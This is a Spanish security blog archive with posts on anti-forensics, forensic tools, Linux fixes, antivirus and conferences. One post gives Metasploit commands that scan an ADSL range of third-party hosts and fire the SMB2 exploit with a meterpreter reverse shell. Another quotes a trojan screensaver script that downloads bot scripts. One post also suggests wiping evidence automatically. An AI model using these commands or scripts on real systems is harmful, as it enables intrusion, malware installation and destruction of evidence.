DECAF existe, y funciona...


A propósito del anterior post sobre M$ Cofee, queremos hablar también de la controversia que ha generado la aparición de su contramedida: la herramienta DECAF, que podéis encontrar en http://decafme.org/.

Y decimos controversia porque existen numerosas noticias informando que DECAF ha sido retirado y que se trata de un truco publicitario para aumentar la concienciación sobre la seguridad (por ej. http://bitelia.com/2009/12/decaf-retirado-todo-fue-un-truco-publicitario).

Nada más lejos de la realidad. La herramienta está disponible y funciona. Podéis descargar la versión 2 desde la página de sus autores, los cuales nos cuentan que se trata de una utilidad anti-forense no sólo contra Cofee sino también para otras ‘célebres’ como Helix, EnCase, Passware, Elcomsoft, FTK Imager Port, Forensic Toolkit, ISOBuster, y Ophcrack.

Esta versión además permite cargar tus propias firmas (‘signatures’) para hacerla válida contra otras suites o herramientas forenses. Permite monitorizar dispositivos USB, CD-ROM y procesos en busca de actividad de alguna de estas herramientas.

Al igual que un IPS, si DECAF, a través de alguna de sus firmas, detecta actividad sospechosa, se encargará de bloquear la pantalla, desactivar el dispositivo y/o ejecutar nuestro propio binario.

Imaginaros las posibilidades de esto último, podemos ocultar y ‘troyanizar’ DECAF  y tener preparado un ejecutable para mandarnos un correo informándonos de que alguien está husmeando en nuestro equipo o, lo que es peor/mejor, borrar información ante cualquier atisbo de duda…


Un vistazo a Microsoft Cofee (Computer Online Forensic Evidence Extractor)

Recientemente, podemos ver en la Red diversas noticias que informan que la herramienta Microsoft Cofee (Computer Online Forensic Evidence Extractor) ha sido filtrada en Internet y, efectivamente, podemos corroborar que hoy por hoy sigue siendo posible descargarla de una forma relativamente sencilla.




Lo que quizás impresiona más es saber que se trata de la suite forense que Microsoft lleva regalando a numerosas entidades policiales desde Junio del año 2007.
Por lo demás, podemos decir que no se trata de una herramienta mágica, si no de otra utilidad forense (buena) comparable a otras disponibles.

De hecho, en nuestro caso llevamos tiempo utilizando una herramienta propia que cubre estas y más funcionalidades para sistemas Windows. Está hecha en perl-tk y durante el año que viene esperamos poder publicarla:



Volviendo a Microsoft Cofee y para ampliar información, decir que normalmente se carga en un pendrive USB e incluye comandos (incluido utilidades de sysinternals) que permiten la automatización en la obtención de evidencias digitales. De momento sólo se puede utilizar contra sistemas XP, 2000 y 2003 y se habla de que ya se está trabajando en la versión para Windows 7.

También tiene un funcionamiento bastante sencillo, resumiendo: tras conectar el pendrive al equipo, se lanza un ejecutable (‘Runme.exe’) que va llamando a cada uno de los comandos (ver lista de abajo) y almacenando la información en un directorio con la fecha actual y el nombre de equipo.

Una vez descargada la información podemos generar un informe HTML:





Por último, os muestro la lista de comandos ejecutados por Cofee contra mi equipo:

at.exe
autorunsc.exe
arp.exe –a
getmac.exe

hostname.exe

ipconfig.exe /all
msinfo32.exe /report %OUTFILE%

nbtstat.exe -A 127.0.0.1

nbtstat.exe –S

nbtstat.exe –c
nbtstat.exe –n

net.exe user

net.exe file
net.exe accounts

net.exe view

net.exe start

net.exe session

net.exe localgroup administrators /domain

net.exe localgroup

net.exe share

net.exe use

net.exe localgroup administrators

net.exe group
netdom.exe query DC
openfiles.exe /query /v

psfile.exe
pslist.exe –t
pslist.exe

psloggedon.exe

psservice.exe
pstat.exe
psuptime.exe
quser.exe

route.exe
sclist.exe
sc.exe query

sc.exe queryex

showgrps.exe
srvcheck.exe \\127.0.0.1
tasklist.exe /svc
whoami.exe
handle.exe –a
netstat.exe –no

netstat.exe –ao

Intel Graphics + Ubuntu 9.10: Solucionar problemas de resolución

Muchos usuarios con tarjetas gráficas Intel que hayan actualizado su versión de Ubuntu (9.10) se habrán encontrado que al iniciar el sistema la resolución no es la correcta.




Para solucionar el problema, una opción es modificar/añadir el archivo xorg.conf y regresar al Driver Intel de Ubuntu 9.04 (Jaunty Jackalope).

A continuación os mostramos cómo solucionarlo:

Paso Previo
 
crear el fichero xorg.conf y añadir las siguientes líneas (gedit /etc/X11/xorg.conf):

Section "Device"
Identifier "Intel 945G"
Driver "intel"
EndSection
Section "Monitor"
Identifier    "Configured Monitor"
EndSection
Section "Screen"
Identifier    "Default Screen"
Monitor        "Configured Monitor"
Device        "Intel Corporation 945G Integrated Graphics Controller"
SubSection "Display"
Virtual 2560 1024
EndSubSection
EndSection

Regresar a la versión anterior del driver

1. añadir las siguientes lineas al sources.list (sudo gedit /etc/apt/sources.list):

deb http://ppa.launchpad.net/siretart/ppa/ubuntu jaunty main
deb-src http://ppa.launchpad.net/siretart/ppa/ubuntu jaunty main

2. importar la clave GPG para que el Firewall permita el uso del paquete a través del Keyserver:

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 0xce90d8983e731f79

3. instalar el driver:

$ sudo apt-get update
$ sudo apt-get install xserver-xorg-video-intel-2.4

4. reiniciar las X para evaluar si el rendimiento gráfico es el adecuado 

$ sudo /etc/init.d/gdm restart

 
Deshacer los cambios (en el caso de que el entorno gráfico no funcione correctamente)

1. eliminar las líneas añadidas anteriormente el el sources.list (sudo gedit /etc/apt/sources.list):

borrar -> deb http://ppa.launchpad.net/siretart/ppa/ubuntu jaunty main
borrar -> deb-src http://ppa.launchpad.net/siretart/ppa/ubuntu jaunty main

2. instalar de nuevo el driver original:

sudo apt-get install xserver-xorg-video-intel

Atacada la página web oficial del Real Madrid

Ayer de madrugada y durante sólo unas horas la página web oficial del Real Madrid presentaba el siguiente aspecto:





Al parecer la página web fue desfigurada por un hacker (seguramente culé) con el alias 'Ibra' y, como podéis ver, en la página principal se subió una imágen con el resultado de la abultante victoria del Regal Barça sobre el Real Madrid en su cancha.


Todavía se desconoce qué tipo de vulnerabilidad ha aprovechado el hacker para realizar el 'deface' y no existen muchos más datos o noticias en la Red.

Os seguiremos informando en cuanto tengamos más información al respecto.



Este artículo fue publicado el día 28 de Diciembre de 2009, Día de los Santos Inocentes. El 'deface' en la página oficial del Real Madrid es mentira. Lo que no lo es, es el partido y su resultado ...

Quitar la publicidad de Avira

Una de las cosas digamos "molestas" de este gran antivirus es que, cada vez que actualiza, muestra una ventana que te recuerda que puedes comprar la versión de pago.

Para solventar el problemilla, a continuación mostramos una serie de pasos sencillos según el sistema operativo que utilices:

Windows 2000 / Windows XP Pro

1. Inicio / Ejecutar.
2. Escribir gpedit.msc y click en OK.
3. Ir a "Configuracion de usuario > Plantillas administrativas > Sistema"
4. Hacer doble click en "No ejecutar aplicaciones de Windows especificadas".
5. Boton derecho > Propiedades > Habilitada y hacer click en Mostrar.
6. Añadir "avnotify.exe".
7. Clicar Ok en todas las ventanas abiertas.
8. Reiniciar

Windows XP Home


1. Reiniciar en modo seguro
2. Iniciar sesión con privilegios administrativos.
3. Ir a : Program Files ( Archivos de programa)\Avira\AntiVir PersonalEdition Classic.
4. Click derecho en avnotify.exe e ir a Propiedades > Seguridad > Avanzado.
5. Click en editar -> Traverse Folder / Execute File-> deny-> OK.
6. Repetir para todos los usuarios
7. Reiniciar en modo normal.

Windows 7 y Vista Business/Ultimate


1. Inicio > Panel de control
2. Herramientas administrativas > Política de seguridad local.
3. Click en Software Restriction Policy > Action > Create new restriction policy.
4. Click derecho, e ir a additional rules > new path rule.
5. Ir a C:\Program files(Archivos de programa)\Avira\AntiVir PersonalEdition Classic y double-click en avnotify.exe.
6. Dejar el nivel de seguridad como no permitido "disallowed"
7. Click en aplicar y OK.

Windows Vista Home Premium


1. Ir a C:\Program Files(archivos de programa)\Avira\AntiVir PersonalEdition Classic\avnotify.exe.
2. Click derecho en avnotify.exe e ir a Propiedades > Seguridad.
3. Bajo el grupo o nombre de usuario "SYSTEM", click editar.
4. Poner una marca bajo la columna DENY para "read and execute".

Comparativa de antivirus

Para aquellos que estén pensando qué antivirus utilizar o que simplemente quieren comprobar la eficacia del que ya tienen instalado, os recomiendo echar un vistazo a la web
 
http://av-comparatives.org.

En ella podemos ver diversas comparativas entre 16 y 18 productos antivirus de alta calidad, reconocidos y usados a nivel mundial, cuyos fabricantes accedieron a ser evaluados e incluidos en estos informes públicos.

En fin, no hay más que ver los resultados...

Explotando Windows SMB2 a través de Metasploit

Recientemente, salió a la luz un aviso que confirmaba un fallo en la implementación del protocolo SMB2 de Windows que podría permitir a un atacante la ejecución remota de código en las últimas versiones del sistema operativo de Microsoft.

Esta vulnerabilidad, que en un principio se publicó como denegación de servicio, fue corregida en Windows 7 build ~7130 (después de la RC1) aunque los usuarios de Windows Vista y Windows Server 2008 parecen seguir estando en riesgo.

Para facilitarnos la vida ;-), se ha liberado al dominio público código completamente funcional para esta vulnerabilidad a través de Metasploit, elevando la posibilidad de ataques de ejecución de código remoto. Se trata del exploit creado y liberado por Stephen Fewer de Harmony Security. A continuación se muestran una serie de pasos para ejecutarlo a través de Metasploit:

Paso 0:

ejecutar msfconsole.bat

Paso 1 :

escanear los objetivos

msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS xx.xx.xx.x-xx.xx.xx.254
RHOSTS =>xx.xx.xx.x-xx.xx.xx.254
msf auxiliary(smb2) > set THREADS 50
THREADS => 50
msf auxiliary(smb2) > run

en el ejemplo, se encontró lo siguiente en el rango ADSL :

[*] xx.xx.xx.x supports SMB 2 [dialect 255.2] and has been online for 285 hours

Paso 2 :

ahora, es necesario chequear la versión del objetivo encontrado (recomendable antes de lanzar el exploit)

msf auxiliary(smb2) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7100) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7229) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows Vista Home Basic Service Pack 2 (language: Unknown)
[*] Auxiliary module execution completed

como se muestra en los resultados obtenidos, se han encontrado un Windows Vista y dos Windows 7. Recordemos que este exploit funcionará contra Windows Vista Sp1-2 y contra Windows 2008 (no rc2).

Paso 3 :

ahora ya se puede configurar y enviar el exploit

msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
set msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set LHOST xx.xx.xx.x
LHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > set RHOST xx.xx.xx.x
RHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > exploit

y por último, se muestra el resultado del exploit en la máquina vulnerable :




CAT: Context App Tool


CAT es una herramienta para facilitar las pruebas manuales en los tests de intrusión web. Esta diseñada para hacer frente a  todos los niveles de pruebas necesarios en este tipo de tests, eliminando las pruebas repetitivas y permitiendo al auditor aprovechar mejor su tiempo y enforcarlo hacia la aplicación web.



Existe una amplia variedad de pruebas que CAT puede llevar a cabo:

- Repetidor de Peticiones – Usado para repetir un petición única
- Proxy – Un proxy Inline clásico
- Fuzzer – Permite enviar una batería de pruebas contra el servidor para fuerza bruta, fuzzing de parámetros, navegación forzada etc.
- Log – Permite ver la lista de peticiones para ordenarlas, buscar repetidas,  etc. Permite modificar y repetir una secuencia de peticiones
- Comprobador de autenticación – Dos proxies sincronizados que pueden ser usados para comprobar los controles de autenticación y autorización.
- Comprobador SSL – Solicita una página específica con varios cifrados SSL y versiones.
- Notepad – Un editor de texto/RTF que se puede utilizar para conversiones,  etc.
- Navegador web – Un navegador web integrado con un proxy pre-configurado basado en el motor de renderización de Internet Explorer.




Existen algunas diferencias reseñables entre CAT y la mayoría de los proxies web disponibles actualmente. Alguna de estas diferencias son:

- Uso del motor de renderización de Internet Explorer para la presentación del HTML
- Soporte de numerosos tipos de conversión de texto incluyendo: URL, Base64, Hex, Unicode, HTML/XML, SQL y JavaScript no Quotes
- Detección de XSS e inyección SQL integrados
- Proxies sincronizados para la comprobación de la autenticación y autorización
- Mayor velocidad gracias a cacheo de las conexiones HTTP
- Comprobador de las versiones y cifrados de SSL usando OpenSSL
- Mayor flexibilidad para importar/exportar los logs y proyectos salvados
- Interfaz con pestañas que permite el uso de múltiples herramientas en una, por ej. múltiples repetidores con diferentes logs
- Capacidad parar repetir y modificar una secuencia de peticiones (aspecto especialmente indicado para las pruebas de SSO)
- ¡Es gratis!

Las pruebas de CAT cubren:

- Modelos complejos de autorización
- Capacidad para testear formularios complejos multi-fase, por ej. sistemas single sign-on (SSO)
- Permite fuzzear formularios protegidos por tokens para CSRF (cross site request forgery)
- Soporte para diferentes codificaciones usados en web services, Ajax y para comproabar otras vulnerabilidades más complejas 
- Capacidad para ejecutar sensitive timing attacks
- Aplicaciones Ajax pesadas

Los hackers españoles más famosos: encuesta

Bueno, quizás el nombre de esta entrada no es el más adecuado puesto que incluso la gente de esta lista puede llegar a no considerarse bajo el "yugo" del término 'hacker'.

No obstante, el término 'hacker' aparece en la Wikipedia como "Gente apasionada por la seguridad informática" y es bajo ese concepto y con el objetivo de dar a conocer los grandes profesionales que tenemos en España por lo que hemos preparado una encuesta. Yendo al grano, queremos saber y dar a conocer cuales son los grandes referentes de esta materia en nuestro país. Aquellos que hemos visto en conferencias de seguridad, que incluso conocemos o que leemos en sus blogs o entradas en diversos foros.

La lista inicial es la formada por los siguientes:

Alejandro Ramos - dab
Albert López - skapunky

Alex - el-brujo

Chema Alonso - maligno

David Barroso

David Cervigón
David Pérez

Javier Olascoaga - DS

Jorge Ortiz

Juan Garrido - Silverhack

Pedro Sanchez

Raúl Jover Baison
Raúl Siles
Román Medina-Heigl - RoMaNSoFt

Sergio de los Santos

Sergio González

Vicente Aceituno

Vicente Diaz

Víctor Manuel de Diego


Os agradecemos vuestros votos así como nuevas propuestas (nombre y/o nick) para incluir en la lista.

En los siguientes meses intentaremos escribir sobre la vida, obra y milagros de estos profesionales. Hasta entonces, ¡felices fiestas!

Ninja v0.1.3 - detecta y previene el escalado de privilegios


Ninja es un herramienta para la detección y prevención de intentos de escalado de privilegios en sistemas GNU/Linux.

Mientras se está ejecutando, monitoriza la actividad de todos los procesos locales y almacena la actividad de aquellos lanzados como root: si un proceso es creado con UID o GID cero, es decir como root, Ninja logeará toda la información necesaria sobre el proceso. Opcionalmente, Ninja matará aquellos procesos que fueron creados por usuarios no autorizados.

Version 0.1.3 (03-12-2009)
•    general: bumped version to 0.1.3
•    log.c do va_start() before writing to logfile to fix segfault on x86_64 platforms. (Reported by Francois Marier & William Vera)


Es posible especificar un grupo "magic" para que sus miembros puedan lanzar un ejecutable con setuid/setgid de root.


Además, se pueden especificar binarios individuales en listas blancas.
Ninja requiere un fichero de configuración para correr, este no es otro que “default.conf” y podemos encontrar un ejemplo del mismo en el directorio “examples/config/” con todas las opciones disponibles especificadas en detalle.


•    Leer How to Ninja
•    Más información: aquí

Vulnerabilidad 0-day Adobe Acrobat/Reader

Recientemente se ha detectado una vulnerabilidad en las versiones 9.2 e inferiores de Adobe Acrobat y Adobe Reader que pueden permitir a un atacante ejecutar código arbitrario en la máquina afectada, al abrir un fichero PDF especialmente modificado. Este fallo parece que está siendo ya explotado ampliamente en Internet.

La presencia activa de JavaScript en Adobe Acrobat y Adobe Reader posibilita el aprovechamiento de esta vulnerabilidad.

Esta vulnerabilidad puede provocar, si se logra explotar, el compromiso del sistema afectado.

De hecho, ya existe un exploit en Metasploit para aprovechar esta vulnerabilidad, lo que facilita mucho su ejecución.

En la actualidad todavía no hay un parche disponible para la misma, ni existe más información al respecto.

Últimamente, Adobe se está convirtiendo en un gran objetivo de los atacantes, ya que se trata de un software muy popular en el cual confían los usuarios y, sobre todo, porque parece que tiene muchos errores graves todavía por descubrir.

Por el momento recomendamos:

1. Deshabilitar JavaScript en Adobe Acrobat y Reader.
2. Usar un lector de PDF alternativo.
3. Bloquear las peticiones DNS y el acceso del dominio foruminspace.com.

Referencias: http://www.securityfocus.com/brief/1049

Normas ISO orientadas a seguridad informática

A continuación adjunto una recopilación de las principales de las normas ISO orientadas a seguridad informática. Podéis encontrar éstas y más en la página oficial de ISO (IT security technices):

# ISO/IEC 15408: Evaluation criteria for IT security (esto es, el Common Criteria)
# ISO/IEC 27000: Information security management systems - Overview and vocabulary
# ISO/IEC 27001: Information security management systems - Requirements
# ISO/IEC 27002: Code of practice for information security management
# ISO/IEC 27004: Information security management measurements
# ISO/IEC 27005: Information security risk management (reemplaza a la ISO/IEC 13335)
# ISO/IEC 27006: International accreditation guidelines for the accreditation of bodies operating certification / Registration of information security management systems
# ISO/IEC 27007: Guidelines for information security management systems auditing
# ISO/IEC 27008: Guidance for auditors on ISMS controls
# ISO/IEC 27010: Information security management for inter-sector communications (for critical infrastructure)
# ISO/IEC 27011: Information security management guidelines for telecommunications organizations based on ISO/IEC 27002
# ISO/IEC 27013: Guidelines for integration implementation of ISO/IEC 20000-1 & ISO/IEC 27001
# ISO/IEC 27014: Information security governance framework
# ISO/IEC 27031: ICT readiness for business continuity
# ISO/IEC 27032: Guidelines for CyberSecurity
# ISO/IEC 27033: Network security (reemplaza a ISO/IEC 18028)
# ISO/IEC 27034: Application security
# ISO/IEC 24760: A framework for identity management
# ISO/IEC 29100: A privacy framework
# ISO/IEC 29101: A privacy reference architecture
# ISO/IEC 29146: A framework for access management
# ISO/IEC 29147: Responsible vulnerability disclosure
# ISO/IEC 29149: Best practice on the provision of timestamping services

Fuente: http://www.iso.org

Salvapantallas malicioso para Linux

Recientemente se ha descubierto un nuevo malware que afecta a plataformas GNU/Linux.


En esta ocasión, el malware fue distribuido en el popular sitio gnome-look.org, un portal legítimo dedicado a brindar recursos para el popular gestor de escritorios GNOME.


El paquete en formato .deb se distribuía con el nombre “waterfall“, y si la víctima lo descargaba, al ejecutarlo se cargaban las instrucciones de un script malicioso, que eleva el privilegio de archivos y prepara el sistema para un ataque de denegación de servicio (DDoS) y la actualización automática vía descargas.


El incidente fue reportado en los foros de Ubuntu y poco tiempo después fue dado de baja el archivo del sitio donde se descargaba.


Una vez más queda demostrado el mito alrededor de este tipo de plataformas, donde existe la idea de que no pueden ser afectadas. Aunque es relativamente cierto que no han existido gran cantidad de virus informáticos para GNU/Linux, sí es probable que otro tipo de amenazas puedan propagarse por el sistema operativo. Tal fue el caso de Psyb0t, un gusano del tipo bot que infectaba modems y routers en sistemas Linux. En el caso que comentamos, se trataba claramente de un troyano, que engañaba al usuario presentándose como un protector de pantalla.


Aunque el caso por suerte no ha pasado a mayores, y los usuarios infectados han sido pocos; es importante que sea cual sea la plataforma que se utilice, los usuarios sean conscientes que esta no puede estar protegida contra cualquier amenaza por el sólo hecho de existir; y que se tomen las medidas de seguridad apropiadas para la protección.


Comentarios De Victimas:

Hello guys Im going to make this breef

I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.********/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.********/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Im no expert but this looks just wrong!!

I have removed the package however I i doubt this has done much good...

Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

Sorry for sounding strange, Just trying to fix this A.S.A.P.

Thank you for any suggestions.



http://ubuntuforums.org/showthread.php?t=1349678

Abiertos los plazos de inscripción del Rooted CON

Rooted CON es un congreso de seguridad informática cuya primera edición tendrá lugar los días 18, 19 y 20 de Marzo de 2010 en Madrid, y que se compondrá de charlas sobre seguridad informática de contenido altamente técnico.

El lugar de la celebración de tal evento es El Auditorio del Centro de Convenciones Mapfre (Avenida General Perón, 40, Madrid).

Ya está abierto el plazo de inscripción con un precio de entrada de 50€ (o 25€ si eres estudiante), un precio que anuncian que irá incrementándose según se acerque la fecha del congreso.

Más información en http://www.rootedcon.es/.

La comisión 'Sinde' retrocede

La Comisión de Propiedad Intelectual, conocida como 'Comisión Sinde' en referencia a la ministra de Cultura, no podrá bloquear páginas web, según ha confirmado el presidente del Gobierno, José Luis Rodríguez Zapatero, a un reducido grupo de periodistas este domingo durante una reunión posterior a los actos oficiales por el 31 aniversario de la Constitución.

La controvertida disposición adicional de la Ley de Economia Sostenible, que determinaba el cese de actividad de una página web cuando ésta vulnerara "los derechos de la propiedad intelectual", será cambiada pero no desaparecerá.

El presidente h
a dicho que la polémica figura de la comisión se mantendrá, pero con sus funciones recortadas, y que entre sus atribuciones no estaría la de cerrar por vía administrativa un sitio de Internet.

El jefe del Ejecutivo ha declarado, además, que la solución a la polémica que esta semana ha sacudido blogs, medios y redes sociales está "cerca" y "será positiva". El desenlace podría llegar o bien en breve en el Consejo de Ministros o bien posteriormente en el trámite parlamentario de la ley.

Fuente: 20 minutos

Extraído de http://unlugarsinfin.blogspot.es

Diccionarios de contraseñas

Copio un gran aporte de Sec-track, ya que nos vendrá bien tenerlo como chuleta para descargar diccionarios cuando necesitemos realizar ataques de fuerza bruta:

Extraído de http://unlugarsinfin.blogspot.es

DISI 2009 en directo o en diferido

Lunes 30 de noviembre: transmisión del DISI 2009 por videostreaming

Como en ediciones previas del Día Internacional de la Seguridad de la
Información, DISI 2009 se transmitirá en directo a través de
videostreaming por medio del Gabinete de Tele-Educación GATE de la
Universidad Politécnica de Madrid en la url:


mms://amon.gate.upm.es/campus-sur


El horario de transmisión será desde las 08:45 hasta las 15:15 horas del
lunes 30 de noviembre de 2009.

Posteriormente se subirán los vídeos (ya editados) de cada sesión en el
Canal YouTube de la UPM donde se encuentran otras grabaciones de eventos
que ha realizado la Cátedra UPM Applus+ (DISI 2008 y Seminario Seguridad
Redes Sociales):


http://www.youtube.com/user/UPM#g/u

Como se puede comprobar en la página Web de la Cátedra UPM Applus+ de
Seguridad y Desarrollo de la Sociedad de la Información que lo organiza,
de 09:30 a 10:30 horas se realizará la conferencia inaugural "Randomized
Hashing: Secure Digital Signatures without Collision Resistance" a cargo
del Dr. Hugo Krawczyk de IBM Research
, Estados Unidos.

De 10:30 a 12:00 horas se celebrará el coloquio "Tendencias en Malware"
con la participación de D. José Bidot, Director de Segurmática (Cuba), D.
Ero Carrera, Chief Research Officer - Collaborative Security Virus Total
(España) y D. Emilio Castellote, Director de Marketing de Panda Security
(España), moderado por D. Justo Carracedo, Catedrático de la EUITT.

De 12:45 a 14:45 horas, el segundo coloquio "Mitos y Realidades en
Hacking"
cuenta con la participación de D. Luis Guillermo Castañeda,
Director de Servicios Profesionales de Rusoft (México), D. Chema Alonso,
Consultor de Seguridad de Informática64 (España), D. Alejandro Ramos,
Manager de TigerTeam SIA (España) y D. Fermín Serna, Security Software
Engineer MSRC Microsoft (España), moderado por D. Daniel Calzada, Profesor
de la EUI.

Extraído de http://unlugarsinfin.blogspot.es


Preparando el cambio

Bueno, ya hace más de un año que alojamos este blog en nuestro queridísimo hosting gratuito blogspot.es.

Carencia de opciones y posibilidades, escaso soporte, un infección masiva reciente y los últimos problemas a la hora de publicar nuestros posts nos han animado a migrar este blog a uno de los dos hostings gratuitos más famosos actualmente: wordpress o blogger.

De momento no hay nada decidido, aunque yo casi me decanto más por blogspot.com (blogger) ya que parece algo más flexible, configurable y extendido que su gran rival. Wordpress parece más indicado para instalar en hostings propios (quién sabe si quizás algún día ).

En fin, que esperamos vuestras opiniones para decantarnos por uno u otro.

También queda pendiente elegir un nuevo nombre para el blog, ya que 'unlugarsinfin' parece estar cogido en blogspot.com y tiene cierta similitud con la famosa novela de Ken Follet (os prometo que tiempo atrás, cuando le puse el nombre al blog, desconocía de su existencia).

Os agradeceríamos por tanto que nos propongais también nuevos nombres para el blog.

Por ahora he cogido estos dos, por si al final gustan y resultan elegidos aunque desgraciadamete un colega brasileño se me adelantó en el blogger:

http://atacantes.wordpress.com

http://atacante.wordpress.com

ah, y también me reservado este nombre, por si surgen añoranzas!:

http://unlugarsinfin.wordpress.com/

Una vez tengamos el nombre definitivo, trabajaremos en el look&feel del nuevo blog y migraremos las entradas antiguas.

Mientras tanto y hasta entonces, seguiremos publicando nuevos posts en este..

Por último, aprovecho para animar a cualquiera a proponer ideas, unirse a este rollo y ser un nuevo autor del nuevo blog.. queda muy bonito y muchas veces sirve de recordatorio para lo que has ido viendo en este mundillo..


Extraído de http://unlugarsinfin.blogspot.es

PenTester Scripting

Brujuleando por la web encontré http://pentesterscripting.com/, una web en el que un grupo de Pentesters e investigadores publica una serie de scripts destinados ha facilitarnos la vida en nuestros tests de intrusión.

Aunque ya existen algunos scripts y muy útiles, la página ha nacido hace relativamente poco, por lo que seguramente habrá que estar atentos a las nuevas publicaciones.

Extraído de http://unlugarsinfin.blogspot.es

Microsoft TechNet: Tour de la innovación, (Valladolid) Lanzamiento Windows 7, Windows

Ayer tuvo lugar el Innovation Tour por parte del equipo del TechNet de Microsoft en el Parque Tecnológico de Boecillo (Valladolid) al cuál no me pude resistir y no falte.

Como invitados al evento estuvieron Fernando Guillot y Paulo Días los dos IT Pro Evangelists de Microsoft, Miguel Hernández MVP Small Business Server y como no podía faltar en este tipo de eventos la presencia de Chema Alonso MVP Windows Sever Security de Informática64.

Aquí va la Agenda del Evento:

10:00 – 10:20 –Keynote : “Innovación en tiempo de crisis”

Presentación de toda la gama de nuevos productos de infraestructura con los que suempresa ahorrará costes y será más eficiente

10:30 – 11:15 – Sesión Windows 7:

Primera toma de contacto con Windows 7, información acerca de las distintas versiones de Windows 7 y nuevas características del sistema operativo, demostraciones de la experiencia de usuario (nueva interface touch, jumplists, Internet Explorer 8), mostraremos la utilidad de Problem Steps Recorder y como se ahorrar tiempo y dinero en las empresas con el helpdesk. Compatibilidad de drivers, aplicaciones. Mostraremos Windows XP Mode como mecanismo de compatibilidad y el soporte nativo al formato VHD.

11:15 – 12:00 – Windows 7 y windows Server 2008 R2 Better Together:

En esta sesión vamos a hablar de las opciones de acceso remoto que proporciona la nueva plataforma, empezando en la situación típica actual con VPNs PPTP, pasando por las conexiones SSTP, la solución para SSTP que representa el paso siguiente - VPN Reconnect y de Direct Access. Posibles mejoras en las empresas que tienen pequeñas (o incluso medianas) delegaciones remotas soluciones para estos escenarios BranchCache y como les puede ayudar a mantener un buen equilibrio entre lo que se gastan en las conexiones de estas delegaciones y la experiencia de usuario que obtienen.

12:00 – 12:30 – Café

12:30 – 13:30 – Novedades en Virtualización con Windows Server 2008 R2 y System Center:

Esta sesión mostraremos las novedades en Hyper-V R2, con demostraciones prácticas de: Live Migration y CSVs Hyper-V Server 2008 R2, también se tratara la Virtualización del Escritorio con las siguientes demostraciones: Portal de Autoservicio con acceso a Remote Apps y Pools de VMs (con App-V) Feed del portal en Windows 7, Gestión de entornos virtualizados y heterogéneos. Para finalizar esta sesión hablaremos de las Novedades de SCVMM2008R2, demostraciones Integración con SCOM y soporte a Linux/Unix

13:30 – 14:30 – Novedades de Exchange 2010:

En esta sesión veremos: Principales novedades en Exchange Server 2010, Descripción de los servicios Online de Exchange de Microsoft, Buzones y grupos moderados, Cumplimiento legal con Políticas de archivado y RMS, novedades en Outlook Web Access, Integración con

Mensajería instantánea, alta disponibilidad con Database Availability Groups

Seguridad perimetral e integración con FSE y TMG, escenarios de migración y

Actualización, monitorización con System Center Operations manager 2007 R2

14:30 – 15:30 – Cocktail

15:30 – 17:00 – Novedades de Seguridad en las plataformas Windows y Forefront:

Mecanismos de seguridad que incluyen las nuevas plataformas, tanto de cliente como de servidor, además de la propuesta de Stirling y Forefront Client Security como plataforma de seguridad integrada. Bitlocker, la herramienta de recuperación Diagnostics and Recovery Toolset (DaRT) de MDOP, y luego UAC y Applocker, seguimos con una parte de seguridad en Internet Explorer 8, demostración comparativas con Firefox, SSL Inspection de TMG, Homegroups y el Firewall de Windows 7 Windows Security Essentials) y de Forefront Client Security + Stirling.

Aquí os dejo unas fotos con los verdaderos protagonistas del evento:


Arriba Paulo Días, Fernando Guillot y Miguel Hernández y abajo Chema Alonso


Clasificación de especies

Cracker
Proviene del termino "Criminal hacker", es aquel que viola la seguridad de un sistema informático, con la diferencia de que lo hace con fines de beneficio personal. También es así llamado a quien diseña cracks informáticos para modificar el comportamiento del software o hardware original sin que pueda ser dañino para el usuario del mismo

Hacker
Son aquellas personas que poseen un amplio conocimiento de alguna de las ramas de la informática. Según sus acciones pueden clasificarse en White Hats, acciones buenas como descubrir los agujeros de seguridad de un programa y notificarlos a la comunidad informática) o Black Hats, descubren los fallos de un programa y lo usan en beneficio propio

Lamer
Proviene del ingles "incompetente", "falto de inteligencia", personas con una boca mas grande que sus habilidades. Suelen ser personas que alardean de ser hackers cuando en realidad utilizan programas de fácil manejo creado por los auténticos hackers sin obtener los resultados que ellos pretendían.

Script kiddie
Es aquella persona que presume de hacker o cracker cuando en realidad no posee un grado de conocimientos suficientes. Se podría decir que es la siguiente fase del lamer.

Phreaker
Es una persona que mediante el uso de la tecnología es capaz de interferir en los sistemas telefónicos de forma ilegal

Geek
Es una persona que comparte una fascinación obsesiva por la tecnología y la imaginación. Se trata de una persona extravagante y extrovertida, tanto en el estilo de vida como en la forma de ser, que hace las cosas por el reconocimiento y la diversión.

Nerd
Es una persona con gran inteligencia y pasión con el conocimiento que tiende a apartarse de la corriente social. Menos extravagante que un Geek

